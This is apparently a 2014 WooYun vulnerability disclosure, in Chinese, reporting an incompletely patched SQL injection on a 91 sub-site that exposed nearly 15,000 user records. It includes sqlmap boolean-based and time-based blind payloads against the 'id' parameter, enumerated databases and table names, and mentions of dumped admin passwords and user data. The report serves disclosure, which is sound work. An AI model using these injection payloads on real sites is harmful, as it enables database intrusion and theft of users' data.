乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-18: 细节已通知厂商并且等待厂商处理中 2014-02-18: 厂商已经确认,细节仅向厂商公开 2014-02-28: 细节向核心白帽子及相关领域专家公开 2014-03-10: 细节向普通白帽子公开 2014-03-20: 细节向实习白帽子公开 2014-04-04: 细节向公众公开
91某分站一个修复不完善的SQL注射,上万用户数据泄露
url:
修复不完善啊
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=287 AND 5004=5004 Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=287 AND SLEEP(5) Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
数据库信息
web application technology: Nginxback-end DBMS: MySQL 5.0.11current user: '[email protected]'current database: 'mmh'
库
available databases [3]:[*] information_schema[*] mmh[*] test
表
Table Name Columnsweibo_topic_link weibo_topic topic thridpart_user tags settings seo_settings reply mood mmh_video mmh_userview mmh_user mmh_special mmh_slide mmh_master mmh_link mmh_info mmh_gbook mmh_comment mmh_co_urls mmh_co_node mmh_co_content mmh_co_channel mmh_channel mmh_agegroup mmh_adsense messages memberex member magicapp_app_active_log_201210 magicapp_app_active_log log_tmp log_201210 log_201208 log_201207 log likes follow expression diybooks_items diyapp_app_active_log_201210 diyapp_app_active_log credit_user credit_type credit_setting blog baby attachments area application app_tags app_items_promote app_items app_item_details app_item_comments app_item_collect app_feedback app_active_log_tmp app_active_log_201212 app_active_log_201211 app_active_log_201210 app_active_log_201209 app_active_log_201208 app_active_log_201207 app_active_log advertisement admin_node activity 91war_app_active_log
管理员密码
用户数据,14892条,包括用户名, 密码,邮箱,密保,登陆IP等等。
如上
过滤啊~有礼物么 :)
危害等级:中
漏洞Rank:8
确认时间:2014-02-18 15:54
感谢 niliu 提交的漏洞,此漏洞正安排处理
暂无